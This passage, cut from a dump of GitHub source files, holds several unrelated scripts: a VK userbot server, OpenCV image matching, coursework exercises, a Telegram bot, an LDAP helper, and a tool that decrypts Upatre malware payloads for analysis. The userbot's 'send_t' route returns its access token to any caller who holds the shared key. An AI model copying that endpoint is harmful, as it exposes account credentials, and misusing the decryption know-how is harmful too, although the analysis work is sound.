record=p)\n","repo_name":"akshayrajp/ag10_sensor_code","sub_path":"writeToDB.py","file_name":"writeToDB.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"5238549451","text":"'''\r\nСоздано: Shubnikov Roman\r\n\r\nВерсия: 1.6\r\n'''\r\nimport json\r\n\r\nimport vk_api\r\nfrom flask import Flask, request, jsonify\r\n\r\n# --------------------------------------------\r\ntoken = \"ТОКЕН\" # ---\r\nsecret = \"КОРОТКИЙ КЛЮЧ ДЛЯ ЮЗЕР-БОТА'а\" # ---\r\n# --------------------------------------------\r\n\r\n\r\napp = Flask(__name__)\r\nvk = vk_api.VkApi(token=token)\r\nversion = \"1.6\"\r\n\r\ndef add_fr(user):\r\n vk.method('friends.add', {'user_id': user})\r\n\r\n\r\ndef del_fr(user):\r\n vk.method('friends.delete', {'user_id': user})\r\n\r\n\r\ndef invite_user(chat, user):\r\n vk.method('messages.addChatUser', {'chat_id': chat, 'user_id': user})\r\n\r\n\r\ndef delete_msg(chat_id, msg_ids, need_get_id=1):\r\n if need_get_id == 1:\r\n vk.method('messages.delete', {'message_ids': get_conv_msg_ids(chat_id, msg_ids), 'delete_for_all': 1})\r\n else:\r\n vk.method('messages.delete', {'message_ids': msg_ids, 'delete_for_all': 1})\r\n\r\n\r\ndef get_peer_id(chat_id):\r\n peer_id = int(chat_id) + 2000000000\r\n return peer_id\r\n\r\ndef gethistory(chat_id, count):\r\n return vk.method('messages.getHistory', {'peer_id': get_peer_id(chat_id), 'count': count})\r\n\r\ndef setRoleMember(chat_id, user, role):\r\n return vk.method('messages.setMemberRole', {'peer_id': get_peer_id(chat_id), \"role\": role, 'member_id': user})\r\n\r\ndef get_user_msg(history, user):\r\n items = history['items']\r\n ids_msgs = \"\"\r\n for i in items:\r\n from_id = i['from_id']\r\n if from_id != \"*\":\r\n id_msg = i['id']\r\n if from_id == int(user):\r\n ids_msgs += str(id_msg) + \",\"\r\n else:\r\n id_msg = i['id']\r\n ids_msgs += str(id_msg) + \",\"\r\n\r\n if ids_msgs != \"\":\r\n ids_msgs = ids_msgs [:len(ids_msgs) - 1]\r\n return ids_msgs\r\n\r\ndef get_conv_msg_ids(chat_id, msg_ids):\r\n ids = \"\"\r\n quest = vk.method('messages.getByConversationMessageId',{'peer_id': get_peer_id(chat_id), 'conversation_message_ids': msg_ids})[\"items\"]\r\n for i in quest:\r\n ids += str(i[\"id\"]) + \",\"\r\n return ids\r\n\r\ndef write_msg(chat_id, mess):\r\n vk.method('messages.send',\r\n {'chat_id': chat_id, 'message': mess,'random_id': 0})\r\n\r\n\r\n@app.route('/', methods=['POST'])\r\ndef result():\r\n data = json.loads(request.data)\r\n task = data.get('task')\r\n object = data.get('object')\r\n vers = data.get('version')\r\n if data.get('secret_key') == secret:\r\n if vers == version:\r\n try:\r\n if task == 'conf':\r\n return jsonify(response=1)\r\n\r\n elif task == \"write_msg\":\r\n write_msg(object['chat_id'], object['msg'])\r\n return jsonify(response=1)\r\n\r\n elif task == 'invite_user':\r\n invite_user(object['chat_id'], object['user'])\r\n write_msg(object['chat_id'], \"✅ Пользователь был добавлен юзерботом\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'delete_msg':\r\n delete_msg(object['chat_id'], object['msg_ids'])\r\n write_msg(object['chat_id'],\"✅ Сообщения удалены\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'soft_delete':\r\n delete_msg(object['chat_id'], object['msg_ids'])\r\n return jsonify(response=1)\r\n\r\n elif task == 'add_fr':\r\n add_fr(object['user'])\r\n write_msg(object['chat_id'],\"✅ Заявка дружбы была отправлена\")\r\n return jsonify(response=1)\r\n\r\n elif task == 'clean':\r\n user = object['user']\r\n chat_id = object['chat_id']\r\n count = object['count']\r\n history = gethistory(chat_id, count)\r\n msg_ids = get_user_msg(history, user)\r\n if msg_ids != \"\":\r\n delete_msg(chat_id, msg_ids, 0)\r\n write_msg(chat_id, \"✅ Сообщения были удалены\")\r\n return jsonify(response=1)\r\n else:\r\n return jsonify(response=10, err=\"За указанный промежуток сообщения не найдены\")\r\n elif task == 'set_role':\r\n user = object['user']\r\n chat_id = object['chat_id']\r\n role = object['role']\r\n setRoleMember(chat_id, user, role)\r\n if role == 'admin':\r\n write_msg(chat_id, \"✅ Пользователь назначен НАСТОЯЩИМ админом беседы\")\r\n else:\r\n write_msg(chat_id, \"✅ C пользователя снят ранг админ\")\r\n return jsonify(response=1)\r\n elif task == 'send_t':\r\n return jsonify(response=1, t=vk.token) \r\n elif task == 'del_fr':\r\n del_fr(object['user'])\r\n write_msg(object['chat_id'], \"✅ Друг был удалён\")\r\n return jsonify(response=1)\r\n else:\r\n return jsonify(response=3)\r\n\r\n except Exception as e:\r\n e = str(e)\r\n if e.startswith(\"[15]\") == True:\r\n return jsonify(response=4, err=e)\r\n elif e.startswith(\"[1]\") == True or e.startswith(\"[10]\") == True:\r\n return jsonify(response=5, err=e)\r\n elif e.startswith(\"[5]\") == True:\r\n return jsonify(response=6, err=e)\r\n elif e.startswith(\"[6]\") == True:\r\n return jsonify(response=7, err=e)\r\n else:\r\n return jsonify(response=0, err=e)\r\n else:\r\n return jsonify(response=8)\r\n else:\r\n return jsonify(response=2)\r\n\r\n\r\n\r\n# ошибка №2 - неверный ключ\r\n# ошибка №4 - пользователь не в друзьях\r\n# ошибка №5 - внутренняя ошибка вк, тут остаётся только ждать и верить в лучшее\r\n# ошибка №6 - неверный токен\r\n# ошибка №7 - У вас слишком перегружен сервер, не раздавайте свой сервер кому попало\r\n# ошибка №8 - Версия бота устарела\r\n# ошибка №9 - Вы не можете удалить сообщения написанные более 24 часов назад\r\n# ошибка №10 - За указанный промежуток сообщения не найдены\r\n# ошибка №0 - страшная ошибка никому неизвестная\r\n","repo_name":"Roman-Shubnikov/User_Bot_For_Convers_Bot","sub_path":"userbot.py","file_name":"userbot.py","file_ext":"py","file_size_in_byte":6998,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"23"} +{"seq_id":"19410687939","text":"import cv2\nimport numpy as np\nfrom PIL import Image\n\ndef stackImages(imgArray,scale,lables=[]):\n sizeW= imgArray[0][0].shape[1]\n sizeH = imgArray[0][0].shape[0]\n rows = len(imgArray)\n cols = len(imgArray[0])\n rowsAvailable = isinstance(imgArray[0], list)\n if rowsAvailable:\n for x in range ( 0, rows):\n for y in range(0, cols):\n imgArray[x][y] = cv2.resize(imgArray[x][y], (sizeW,sizeH), None, scale, scale)\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)\n imageBlank = np.zeros((sizeH, sizeW, 3), np.uint8)\n hor = [imageBlank]*rows\n hor_con = [imageBlank]*rows\n for x in range(0, rows):\n hor[x] = np.hstack(imgArray[x])\n hor_con[x] = np.concatenate(imgArray[x])\n ver = np.vstack(hor)\n ver_con = np.concatenate(hor)\n else:\n for x in range(0, rows):\n imgArray[x] = cv2.resize(imgArray[x], (sizeW, sizeH), None, scale, scale)\n if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)\n hor= np.hstack(imgArray)\n hor_con= np.concatenate(imgArray)\n ver = hor\n if len(lables) != 0:\n eachImgWidth= int(ver.shape[1] / cols)\n eachImgHeight = int(ver.shape[0] / rows)\n print(eachImgHeight)\n for d in range(0, rows):\n for c in range (0,cols):\n cv2.rectangle(ver,(c*eachImgWidth,eachImgHeight*d),(c*eachImgWidth+len(lables[d])*13+27,30+eachImgHeight*d),(255,255,255),cv2.FILLED)\n cv2.putText(ver,lables[d],(eachImgWidth*c+10,eachImgHeight*d+20),cv2.FONT_HERSHEY_COMPLEX,0.7,(255,0,255),2)\n return ver\n\ndef image_resize(image, width = None, height = None, inter = cv2.INTER_AREA):\n # initialize the dimensions of the image to be resized and\n # grab the image size\n dim = None\n (h, w) = image.shape[:2]\n\n # if both the width and height are None, then return the\n # original image\n if width is None and height is None:\n return image\n\n # check to see if the width is None\n if width is None:\n # calculate the ratio of the height and construct the\n # dimensions\n r = height / float(h)\n dim = (int(w * r), height)\n\n # otherwise, the height is None\n else:\n # calculate the ratio of the width and construct the\n # dimensions\n r = width / float(w)\n dim = (width, int(h * r))\n\n # resize the image\n resized = cv2.resize(image, dim, interpolation = inter)\n\n # return the resized image\n return resized\n\nMIN_MATCHES = 20\n# w, h = 500, 500\n\n# cap = cv2.imread('images/1.jpg')\n# print(f\"\\n\\n\\n{cap}\")\ncapVid = cv2.VideoCapture('video/test_vertical.mp4')\n_, cap = capVid.read()\n# print(f\"\\n\\n\\n{cap}\")\n\n\nmodel = cv2.imread('images/Target_resize_1.jpg')\nmyVid = cv2.VideoCapture('video/video.mp4')\nsuccess, imgVideo = myVid.read()\n\n# resize imgVideo\nhT, wT, cT = model.shape\n\n#resize imgFrame\nimgVideo = image_resize(imgVideo, width=wT, height=hT)\n\n#resize cap\ncap = image_resize(cap, width=wT, height=hT)\n\n\nimgAug = cap.copy()\n# detection = False\n# frameCounter = 0\n\n# ORB keypoint detector\norb = cv2.ORB_create()\n\n# create brute force matcher object\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n# Compute model keypoints and its descriptors\nkp_model, des_model = orb.detectAndCompute(model, None)\n\n# Compute scene keypoints and its descriptors\nkp_frame, des_frame = orb.detectAndCompute(cap, None)\n\n# Match frame descriptors with model descriptors\nmatches = bf.match(des_model, des_frame)\n\n# Sort them in the order of their distance\nmatches = sorted(matches, key=lambda x: x.distance)\n\n\nif len(matches) > MIN_MATCHES:\n # detection = True\n # draw first 15 matches.\n imgFeatures = cv2.drawMatches(model, kp_model, cap, kp_frame,\n matches[:MIN_MATCHES], 0, flags=2)\n\n print('\\n\\n\\n\\n--------------------\\n\\n\\n\\n')\n print(f'kp1_len:\\t{len(kp_model)}')\n print(f'kp2_len:\\t{len(kp_frame)}')\n print(f'matches_len:\\t{len(matches)}')\n\n\n src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\n dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\n # compute Homography\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\n\n # Draw a rectangle that marks the found model in the frame\n h, w, _ = model.shape\n pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)\n # project corners into frame\n dst = cv2.perspectiveTransform(pts, M)\n # connect them with lines\n img2 = cv2.polylines(cap, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)\n\n imgWarp = cv2.warpPerspective(imgVideo, M, (cap.shape[1], cap.shape[0]))\n maskNew = np.zeros((cap.shape[0], cap.shape[1]), np.uint8)\n cv2.fillPoly(maskNew, [np.int32(dst)], (255, 255, 255))\n\n maskInv = cv2.bitwise_not(maskNew)\n imgAug = cv2.bitwise_and(imgAug, imgAug, mask=maskInv)\n imgAug = cv2.bitwise_or(imgWarp, imgAug)\n\n StackedImages = stackImages(([cap, imgVideo, model],\n [imgFeatures, imgWarp, imgAug]), 0.5)\n\n # if detection == False:\n # myVid.set(cv2.CAP_PROP_POS_FRAMES, 0)\n # frameCounter = 0\n # else:\n # if frameCounter == myVid.get(cv2.CAP_PROP_FRAME_COUNT):\n # myVid.set(cv2.CAP_PROP_POS_FRAMES, 0)\n # frameCounter = 0\n # success, imgVideo = myVid.read()\n\n\n # cv2.imshow('cap', cap)\n # cv2.imshow('img2', img2)\n # cv2.imshow('imgAug', imgAug)\n cv2.imshow('StackedImages', StackedImages)\n cv2.imwrite('result/aug.jpg', StackedImages)\n # cv2.waitKey(0)\nelse:\n print (\"Not enough matches have been found - %d/%d\" % (len(matches),\n MIN_MATCHES))\n\n","repo_name":"bateikoEd/object_recognition","sub_path":"Lab4/bound.py","file_name":"bound.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"1849485794","text":"with open(\"../inputs/d06.txt\") as f:\n data = [int(x) for x in f.read().strip().split(\",\")]\n\n# data = [3, 4, 3, 1, 2]\n\n\ndef iterate(data):\n new = [6 if x == 0 else x - 1 for x in data]\n return new + [8] * data.count(0)\n\n\nprint(\"initial....\", \":\", len(data), \"\".join(str(x) for x in data))\n\nfor x in range(1, 81):\n data = iterate(data)\n print(\"after day\", x, \":\", len(data)) # , \"\".join(str(x) for x in data))\n","repo_name":"akx/aoc2021","sub_path":"py/d06.py","file_name":"d06.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"11806106444","text":"import os\n\nnombre_fichero = 'text.txt'\n\n\ndef mostrar_fichero():\n try:\n with open(nombre_fichero,'r') as fichero:\n print(f'[*] Contenido de {nombre_fichero}: ')\n print(fichero.read())\n except:\n print(f'El fichero \"{nombre_fichero}\" no existe')\n \ndef añadir_linea_fichero(modo_apertura):\n x = input(\"Inserta una nueva línea: \")\n with open(nombre_fichero,modo_apertura) as fichero:\n fichero.write(x+'\\n')\n \n \n \n \n \n \n \n \nif os.path.exists(nombre_fichero):\n res = input(f'[*] El \"{nombre_fichero}\" fichero ya existe, desea borrarlo y generarlo de nuevo? Y/N'+'\\n')\n if res == 'Y':\n añadir_linea_fichero('w') # Borra y crea de nuevo\n mostrar_fichero()\n elif res == 'N':\n añadir_linea_fichero('a') # Añade nueva línea al final\n mostrar_fichero()\n else:\n print(\"ERROR: Respuesta incorrecta.\") \nelse:\n añadir_linea_fichero('a') \n mostrar_fichero()\n \n \n \n ","repo_name":"mouredev/retos-programacion-2023","sub_path":"Retos/Reto #34 - EL TXT [Media]/python/MaikRG.py","file_name":"MaikRG.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"es","doc_type":"code","stars":4219,"dataset":"github-code","pt":"23"} +{"seq_id":"2164051610","text":"from random import uniform\n\nvar = list()\n\nfor i in range(10):\n aux = list()\n for j in range(3):\n aux.append(round(uniform(0, 10), 1))\n var.append(aux)\n\nfor pos, a in enumerate(var):\n print(f'Aluno {pos + 1:>2}: {a}')\n\npos = 0\nfor j in range(3):\n m = 10\n for i in range(10):\n if var[i][j] < m:\n m = var[i][j]\n pos = i\n print(f'A menor nota da prova {j + 1} foi {m} do aluno {pos + 1}')\n var.pop(pos)\n var.insert(pos, [11, 11, 11])\n","repo_name":"Jpedrosrt/Python-D","sub_path":"Ex/Seção 7/Parte 2/ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10681589687","text":"\"\"\"\n Tabela 5.3 pg.75\n Critérios para a indicação da necessidade e da quantidade de corretivos da acidez para culturas de grãos.\n\"\"\"\n\nTABLE_5_3 = {\n \"in_all_cases\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n },\n \"system_implementation\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n\n },\n \"Consolidated_system_no_restriction\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": None\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"shallow\"\n\n },\n \"Consolidated_system_with_restriction\": {\n \"decision_making\": {\n \"ph\": 5.5,\n \"al\": 30\n },\n \"ph_reference\": 6,\n \"aplication_mode\": \"incorporated\"\n\n },\n}\n","repo_name":"ThiagoBava/tcc_api","sub_path":"api/tables/table_5_3.py","file_name":"table_5_3.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"3465392915","text":"import random\nans=random.randint(1, 99)\nmin, max=0, 100\namount=5 #可猜五次\nwhile amount>0:\n amount-=1\n guess=int(input('請在%d-%d之間猜數字:'%(min, max)))\n #驗證範圍?\n if guess <=min or guess>=max:\n print('輸入範圍錯誤')\n continue\n #是否猜對 ?\n if guess > ans:\n max=guess\n elif guess < ans:\n min=guess\n else:\n print('恭喜答對了')\n break\n #若都沒猜對\n if amount==0:\n print(\"你是非洲人 快看答案:\",str(ans))\n\n\n\n","repo_name":"HuaMa001/python001","sub_path":"d04/guess number.py","file_name":"guess number.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"5682730242","text":"import config\nimport pytest\nfrom utils import testing, stun\nfrom utils.connection_util import ConnectionTag, new_connection_by_tag\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize(\n \"connection_tag,public_ip\",\n [\n pytest.param(ConnectionTag.DOCKER_CONE_CLIENT_1, \"10.0.254.1\"),\n pytest.param(\n ConnectionTag.WINDOWS_VM,\n \"10.0.254.7\",\n marks=[\n pytest.mark.windows,\n pytest.mark.xfail(reason=\"test is flaky - LLT-4213\"),\n ],\n ),\n pytest.param(ConnectionTag.MAC_VM, \"10.0.254.7\", marks=pytest.mark.mac),\n ],\n)\nasync def test_client_basic_stun(connection_tag: ConnectionTag, public_ip: str) -> None:\n async with new_connection_by_tag(connection_tag) as connection:\n ip = await testing.wait_long(stun.get(connection, config.STUN_SERVER))\n assert ip == public_ip, f\"wrong public ip for the client {ip}\"\n","repo_name":"NordSecurity/libtelio","sub_path":"nat-lab/tests/test_client_basic_stun.py","file_name":"test_client_basic_stun.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"23"} +{"seq_id":"11223099971","text":"import logging\nimport os\nimport time\nfrom http import HTTPStatus\n\nimport requests\nfrom dotenv import load_dotenv\nimport telegram\n\nimport exceptions\n\nload_dotenv()\n\nPRACTICUM_TOKEN = os.getenv(\"PRACTICUM_TOKEN\")\nTELEGRAM_TOKEN = os.getenv(\"TELEGRAM_TOKEN\")\nTELEGRAM_CHAT_ID = os.getenv(\"TELEGRAM_CHAT_ID\")\n\nRETRY_PERIOD = 600\nENDPOINT = \"https://practicum.yandex.ru/api/user_api/homework_statuses/\"\nHEADERS = {\"Authorization\": f\"OAuth {PRACTICUM_TOKEN}\"}\n\nHOMEWORK_VERDICTS = {\n \"approved\": \"Работа проверена: ревьюеру всё понравилось. Ура!\",\n \"reviewing\": \"Работа взята на проверку ревьюером.\",\n \"rejected\": \"Работа проверена: у ревьюера есть замечания.\",\n}\n\n\ndef send_message(bot, message):\n \"\"\"Отправка сообщений через бот Телеграм.\"\"\"\n try:\n bot.send_message(TELEGRAM_CHAT_ID, message)\n logging.debug(f\"Сообщение в телеграмм отправленно: {message}\")\n except Exception as error:\n logging.error(f\"Ошибка при подключении к API Telegram: {error}\")\n\n\ndef get_api_answer(timestamp):\n \"\"\"Функция обращения к API Практикум.\"\"\"\n params = {\"from_date\": timestamp}\n try:\n response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n content = response.json()\n except requests.exceptions.RequestException as request_error:\n logging.error(f\"Код ответа не OK: {request_error}\")\n raise exceptions.RequestError(f\"Код ответа не OK: {request_error}\")\n if response.status_code == HTTPStatus.OK:\n return content\n else:\n raise exceptions.InvalidHttp(\"Ошибка API Яндекс.Практикума\")\n\n\ndef check_response(response):\n \"\"\"Прверка ответа API Яндекс.Практикума.\"\"\"\n if isinstance(response, dict):\n try:\n timestamp = response[\"current_date\"]\n if not isinstance(response, dict):\n logging.error(\"В response передан не словарь!\")\n raise exceptions.NoDictCurrentDate(\n \"В response передан не словарь!\"\n )\n\n except KeyError:\n logging.error(\"Ключ current_date в Яндекс.Практикуме отсутсвует\")\n try:\n homeworks = response[\"homeworks\"]\n except KeyError:\n logging.error(\"Ключ homeworks в Яндекс.Практикуме отсутсвует\")\n\n if isinstance(timestamp, int) and isinstance(homeworks, list):\n return homeworks\n else:\n raise TypeError(\"Ошибка типа TypeError\")\n else:\n raise TypeError(\"Ошибка типа TypeError\")\n\n\ndef parse_status(homework):\n \"\"\"Проверка статуса ДЗ.\"\"\"\n homework_name = homework.get(\"homework_name\")\n homework_status = homework.get(\"status\")\n if homework_status is None:\n raise exceptions.HomeworkStatus(\n \"Ошибка, пустое значение status: \", homework_status\n )\n if homework_name is None:\n raise exceptions.HomeworkName(\n \"Ошибка, пустое значение в homework_name: \", homework_name\n )\n if homework_status in HOMEWORK_VERDICTS:\n verdict = HOMEWORK_VERDICTS.get(homework_status)\n return f'Изменился статус проверки работы \"{homework_name}\". {verdict}'\n else:\n raise exceptions.HomeworkStatusIsNone(\"Ошибка, отсутсвует статус ДЗ\")\n\n\ndef check_tokens():\n \"\"\"Функция проверка токена и id чата.\"\"\"\n tokens = {\n \"practicum_token\": PRACTICUM_TOKEN,\n \"telegram_token\": TELEGRAM_TOKEN,\n \"telegram_id\": TELEGRAM_CHAT_ID,\n }\n for key, value in tokens.items():\n if value is None:\n logging.critical(f\"{key}, Отсутсвует\")\n return False\n return True\n\n\ndef main():\n \"\"\"Основная логика работы бота.\"\"\"\n if check_tokens():\n bot = telegram.Bot(token=TELEGRAM_TOKEN)\n timestamp = int(time.time())\n error_name = ''\n\n while True:\n try:\n response = get_api_answer(timestamp)\n homeworks = check_response(response)\n count_works = len(homeworks)\n while count_works > 0:\n message = parse_status(homeworks[count_works - 1])\n send_message(bot, message)\n count_works -= 1\n timestamp = int(time.time())\n time.sleep(RETRY_PERIOD)\n\n except Exception as error:\n message = f\"Сбой в работе программы: {error}\"\n if error != error_name:\n send_message(bot, message)\n error_name = error\n logging.error(message)\n time.sleep(RETRY_PERIOD)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(\n level=logging.DEBUG,\n filename=\"main.py\",\n format=\"%(asctime)s, %(levelname)s, %(message)s, %(name)s\",\n )\n main()\n","repo_name":"Anac0n6a/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10716650976","text":"\"\"\"Upatre Payload Decrypter\nJohannes Bader\n\nTries to decrypt the payload format of Upatre downloads\n\nsee\nhttp://www.johannesbader.ch/2015/06/Win32-Upatre-BI-Part-4-Payload-Format/\n\n\"\"\"\nimport os\nimport sys\nimport struct\nimport signal\nimport argparse\nimport libs.lznt1\n\nif sys.version_info[0] != 2:\n print(\"only runs with Python 2.x\")\n quit()\n\n\n\ndef _p(field, value):\n if type(value) == int:\n value = value & 0xFFFFFFFF\n print(\"{:15}: {:08x}\".format(field, value))\n else:\n print(\"{:15}: {}\".format(field, value))\n\ndef ror(value, places):\n return ((value >> places) ^ (value << (32 - places))) & 0xFFFFFFFF\n\ndef rol(value, places):\n return ((value << places) ^ (value >> (32 - places))) & 0xFFFFFFFF\n\ndef inc_dec_reverse(size_key, type_):\n u = (size_key & 0xFFFF)\n l = size_key >> 16\n if type_ == \"inc\":\n if l - 4 < 0:\n u -= 1\n l -= 4\n elif type_ == \"dec\":\n if l + 4 > 0xFFFF:\n u += 1\n l += 4\n elif type_ == \"dec2\":\n if l + 8 > 0xFFFF:\n u += 1\n l += 8\n return [((u << 16) ^ (l & 0xFFFF)) & 0xFFFFFFFF]\n\ndef rol_reverse(size_key):\n u = (size_key & 0xFFFF) << 16\n l = size_key >> 16\n lm = 0x0000FFFF\n um = 0xFFFF0000\n li = ror(l, 4) \n lm = ror(lm, 4) \n ui = ror(u, 3) \n um = ror(um, 3) \n k = (ui & um) ^ (li & lm)\n keys = [k, k + 0x00001000, k + 0x10000000, k + 0x10001000]\n return keys\n\ndef decrypt(c, key, ksa, check_key=None):\n p = c[0:4]\n for i in range(4,len(c), 4):\n if len(c[i:i+4]) == 4:\n enc = struct.unpack('I', c[i:i+4])[0]\n dec = enc ^ key\n p += struct.pack('I', dec)\n if ksa == \"rol\":\n key = rol(key, 1)\n elif ksa == \"inc\":\n key = (key + 1) & 0xFFFFFFFF \n elif ksa == \"dec\":\n key = (key - 1) & 0xFFFFFFFF \n elif ksa == \"dec2\":\n key = (key - 2) & 0xFFFFFFFF \n elif ksa == \"chk\":\n key = (key + check_key) & 0xFFFFFFFF\n else:\n print(\"invalid ksa: {}\".format(ksa))\n quit()\n return p\n\ndef handler(signum, frame):\n global timeout\n timeout = True\n raise Exception(\"timeout\")\n\ndef decompress(p, old):\n if old:\n offset_data = 4\n compressed_size = len(p) - 4\n else:\n offset_data = struct.unpack('H', p[0xC:0xE])[0]\n compressed_size = struct.unpack('I', p[0xE:0x12])[0]\n unc = libs.lznt1.dCompressBuf(p[offset_data:offset_data + compressed_size])\n return unc\n\ndef offset_check(p):\n file_size = struct.unpack('I', p[0x12:0x16])[0]\n offset_stub = struct.unpack('H', p[0x8:0xA])[0]\n offset_data = struct.unpack('H', p[0xC:0xE])[0]\n compressed_size = struct.unpack('I', p[0xE:0x12])[0]\n if offset_stub > file_size or offset_data > file_size or \\\n compressed_size > file_size:\n return 0\n else:\n return 1\n\ndef find_keys(c, enc_file): \n size = os.stat(enc_file).st_size\n size_enc = struct.unpack('I', c[0x12:0x16])[0]\n size_key = struct.unpack('I', c[0x12:0x16])[0] ^ size\n keys = {}\n keys['inc'] = inc_dec_reverse(size_key, \"inc\")\n keys['dec'] = inc_dec_reverse(size_key, \"dec\")\n keys['dec2'] = inc_dec_reverse(size_key, \"dec2\")\n keys['rol'] = rol_reverse(size_key)\n return keys\n\ndef crack_payload(enc_file, key, check_key, ksa, old):\n with open(enc_file, 'rb') as r:\n c = r.read()\n\n if key and ksa:\n keys = {ksa: [key]}\n elif key:\n keys = {}\n for ksa in ['inc', 'dec', 'dec2', 'rol']:\n keys[ksa] = [key]\n if check_key:\n keys['chk'] = [key]\n else:\n keys = find_keys(c, enc_file)\n\n print(\"testing potential keys\".format(len(keys)))\n for ksa, tkeys in keys.items():\n for key in tkeys:\n _p(\"key (with ksa = {})\".format(ksa), key)\n p = decrypt(c, key, ksa, check_key)\n s = 1 if old else offset_check(p)\n if not s:\n print(\" -> invalid offsets\")\n continue\n\n\n unc = decompress(p, old)\n try:\n unc = decompress(p, old)\n except Exception as e:\n print(\" -> decompression failed {}\".format(e))\n continue\n if unc[0:2] == \"MZ\": \n print(\" -> begins with MZ header, this is it!\")\n out_file = \"decrypted_\" + enc_file\n with open(out_file, \"wb\") as w:\n w.write(bytes(unc))\n print(\" -> written decrypted exe to: {}\".format(out_file))\n _p(\" -> decrypt_key\", key)\n _p(\" -> ksa\", ksa)\n _p(\" -> check_key\", struct.unpack(\"I\", p[4:8])[0])\n _p(\" -> stub entry\", struct.unpack(\"H\", p[8:0xA])[0])\n _p(\" -> com. start\", struct.unpack(\"H\", p[0xC:0xE])[0])\n _p(\" -> com. size\", struct.unpack(\"I\", p[0xE:0x12])[0])\n return 1 \n else:\n print(\" -> file does not start with MZ header\")\n continue\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(\"decrypt Upatre payload\")\n parser.add_argument(\"payload_file\")\n parser.add_argument(\"-k\", \"--key\", default=\"0\")\n parser.add_argument(\"-s\", \"--ksa\")\n parser.add_argument(\"-c\", \"--check_key\", default=\"0\")\n parser.add_argument(\"-o\", \"--old\")\n args = parser.parse_args()\n crack_payload(args.payload_file, int(args.key, 16), int(args.check_key, 16),\n args.ksa, args.old)\n","repo_name":"baderj/upatre","sub_path":"upatre_payload_decrypter.py","file_name":"upatre_payload_decrypter.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"44005285391","text":"import ldap3\nimport ssl\n\nfrom . import ssl_util\n\n\nclass Connection(object):\n def __init__(self, account):\n self.account = account\n\n # Don't allow non-secure connections for now; always require SSL/TLS\n if self.account.protocol != 'ldaps':\n raise Exception('Insecure LDAP not supported')\n\n ca_certs_file = list(ssl_util.find_ca_cert_files())[0]\n tls = ldap3.Tls(validate=ssl.CERT_REQUIRED,\n version=ssl.PROTOCOL_TLSv1,\n ca_certs_file=ca_certs_file)\n\n LDAPS_PORT = 636\n connect_timeout = 5.0\n self.server = ldap3.Server(self.account.server, port=LDAPS_PORT,\n use_ssl=True, tls=tls,\n connect_timeout=connect_timeout)\n self.setup_conn()\n\n def setup_conn(self):\n self.conn = ldap3.Connection(self.server, self.account.user,\n self.account.password)\n if not self.conn.bind():\n raise Exception(self.conn.last_error)\n\n def search(self, base_dn, filter, attrs=None, scope='SUBTREE'):\n if attrs is None:\n attrs = ldap3.ALL_ATTRIBUTES\n result = self.conn.search(base_dn, filter, scope, attributes=attrs)\n if not result:\n raise Exception(self.conn.last_error)\n return self.conn.entries\n","repo_name":"simpkins/amt","sub_path":"amt/ldap.py","file_name":"ldap.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"42635916771","text":"import asyncio\nfrom contextlib import suppress\n\nfrom testandconquer import logger\nfrom testandconquer.client import MessageType\nfrom testandconquer.serializer import Serializer\nfrom testandconquer.util import system_exit\n\n\nclass Scheduler:\n def __init__(self, settings, client, suite_items, worker_id, serializer=Serializer):\n self.settings = settings\n self.client = client\n self.suite_items = suite_items\n self.worker_id = worker_id\n self.serializer = serializer\n\n self.more = True\n self.schedule_queue = asyncio.Queue()\n self.report_queue = asyncio.Queue()\n self.task = asyncio.ensure_future(self._report_task())\n client.subscribe(self)\n\n async def next(self):\n return await self.schedule_queue.get()\n\n async def 